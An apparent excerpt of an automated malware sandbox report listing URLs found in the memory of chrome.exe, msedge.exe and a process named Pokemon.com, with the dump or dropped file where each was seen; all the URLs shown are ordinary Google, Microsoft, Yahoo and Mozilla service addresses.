                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7319$
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320
                Source: chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7320$
                Source: chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7369
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713153139.00007C1C00C20000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7382
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489
                Source: chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7489$
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604
                Source: chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7604$
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7714
                Source: chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847
                Source: chrome.exe, 00000010.00000002.2706524682.00007C1C004B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7847$
                Source: chrome.exe, 00000010.00000002.2712107078.00007C1C00AC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626599628.00007C1C003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626653750.00007C1C00DC8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000003.2773681849.00005C8400380000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899
                Source: chrome.exe, 00000010.00000002.2712107078.00007C1C00AC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://anglebug.com/7899$
                Source: chrome.exe, 00000010.00000003.2670389834.00007C1C02C80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: msedge.exe, 00000014.00000003.2775649841.0000026FF17B0000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2839439506.0000026FF17B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: Reporting and NEL.23.drString found in binary or memory: https://bzib.nelreports.net/api/report?cat=bingbusiness
                Source: chrome.exe, 00000010.00000002.2713588754.00007C1C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706664303.00007C1C00500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
                Source: Pokemon.com, 0000000C.00000002.3074481165.0000000004210000.00000004.00000800.00020000.00000000.sdmp, WLFCTJ.12.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.ico
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625679705.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
                Source: Pokemon.com, 0000000C.00000002.3074481165.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3078503305.000000000671B000.00000004.00000800.00020000.00000000.sdmp, K6XB16.12.dr, Web Data.22.dr, WLFCTJ.12.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
                Source: chrome.exe, 00000010.00000002.2712637460.00007C1C00B74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
                Source: Pokemon.com, 0000000C.00000002.3074481165.0000000004210000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3078503305.000000000671B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706334888.00007C1C00428000.00000004.00000800.00020000.00000000.sdmp, K6XB16.12.dr, Web Data.22.dr, WLFCTJ.12.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: chrome.exe, 00000010.00000003.2637997719.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2845246361.00005C840017C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
                Source: chrome.exe, 00000010.00000002.2715164010.00007C1C00FB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2710713687.00007C1C00968000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715650379.00007C1C0118C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713913168.00007C1C00D0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2711269920.00007C1C009D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
                Source: chrome.exe, 00000010.00000002.2713913168.00007C1C00D0C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=enQ
                Source: chrome.exe, 00000010.00000003.2628640201.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2626391112.00007C1C00C48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2643146123.00007C1C00C60000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2689129631.00007C1C0033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2637997719.00007C1C00D8C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
                Source: chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2665322466.00001B0400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2617231990.00001B040071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
                Source: chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2665322466.00001B0400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2617231990.00001B040071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
                Source: chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
                Source: chrome.exe, 00000010.00000003.2662673911.00007C1C02914000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2667575304.00007C1C02654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2667503110.00007C1C02650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2703809491.00001B0400920000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2665322466.00001B0400974000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2617231990.00001B040071C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
                Source: chrome.exe, 00000010.00000003.2662673911.00007C1C02914000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/https://google-ohttp-relay-query.fastly-edge.com/
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
                Source: chrome.exe, 00000010.00000002.2705307767.00007C1C0020C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
                Source: msedge.exe, 00000014.00000002.2845246361.00005C840017C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.22.drString found in binary or memory: https://chromewebstore.google.com/
                Source: chrome.exe, 00000010.00000002.2714723724.00007C1C00E84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g
                Source: chrome.exe, 00000010.00000003.2613654695.00001550002E0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2613673296.00001550002EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
                Source: chrome.exe, 00000010.00000002.2704873327.00007C1C000DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/c
                Source: chrome.exe, 00000010.00000003.2622417886.00007C1C004A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708196852.00007C1C00719000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707577434.00007C1C00678000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708155712.00007C1C00708000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000014.00000002.2842464846.00005C8400040000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: chrome.exe, 00000010.00000002.2698125418.00000024D99FD000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crxI&
                Source: chrome.exe, 00000010.00000002.2711111299.00007C1C009AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collection-images?rt=b
                Source: chrome.exe, 00000010.00000002.2711111299.00007C1C009AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/collections?rt=b
                Source: chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
                Source: chrome.exe, 00000010.00000002.2707388637.00007C1C00628000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: Pokemon.com, 0000000C.00000002.3074481165.00000000041F4000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3074481165.0000000004193000.00000004.00000800.00020000.00000000.sdmp, Pokemon.com, 0000000C.00000002.3073484431.0000000000E08000.00000004.00000020.00020000.00000000.sdmp, AS26FU.12.drString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: chrome.exe, 00000010.00000002.2716662521.00007C1C01698000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
                Source: Reporting and NEL.23.drString found in binary or memory: https://deff.nelreports.net/api/report
                Source: Reporting and NEL.23.dr, 2cc80dabc69f58b6_0.22.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: Reporting and NEL.23.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
                Source: chrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.goog
                Source: chrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.googl0
                Source: chrome.exe, 00000010.00000002.2705712223.00007C1C00310000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.22.drString found in binary or memory: https://docs.google.com/
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/
                Source: chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/:
                Source: chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2625434291.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713081034.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715561352.00007C1C01154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=installed_webapp
                Source: chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/J
                Source: chrome.exe, 00000010.00000003.2662793010.00007C1C0240C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/dogl
                Source: chrome.exe, 00000010.00000002.2714029253.00007C1C00D3C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultc
                Source: chrome.exe, 00000010.00000002.2714029253.00007C1C00D3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultlt
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/installwebapp?usp=chrome_defaultnjb
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/njb
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708918579.00007C1C007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708918579.00007C1C007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000010.00000003.2632036175.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706590684.00007C1C004D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2649270304.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2684694630.00007C1C00BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2712793704.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708918579.00007C1C007C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2709028513.00007C1C007D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.2672047195.00007C1C00BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/forms/u/0/create?usp=chrome_actionsy
                Source: chrome.exe, 00000010.00000002.2715928120.00007C1C012D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/
                Source: chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/:
                Source: chrome.exe, 00000010.00000003.2625434291.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713081034.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715561352.00007C1C01154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/?usp=installed_webapp
                Source: chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/J
                Source: chrome.exe, 00000010.00000002.2714839708.00007C1C00EC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2716151641.00007C1C012F9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_default
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultidd_art_url
                Source: chrome.exe, 00000010.00000002.2707021602.00007C1C005C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/installwebapp?usp=chrome_defaultmetadataamees
                Source: chrome.exe, 00000010.00000002.2704552562.00007C1C0001C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/ogl
                Source: chrome.exe, 00000010.00000002.2713588754.00007C1C00C90000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706664303.00007C1C00500000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2708399052.00007C1C00724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/u/0/create?usp=chrome_actions
                Source: chrome.exe, 00000010.00000002.2705243132.00007C1C001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/
                Source: chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/:
                Source: chrome.exe, 00000010.00000003.2625434291.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2713081034.00007C1C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2715561352.00007C1C01154000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/?usp=installed_webapp
                Source: chrome.exe, 00000010.00000002.2706275166.00007C1C0041C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/J
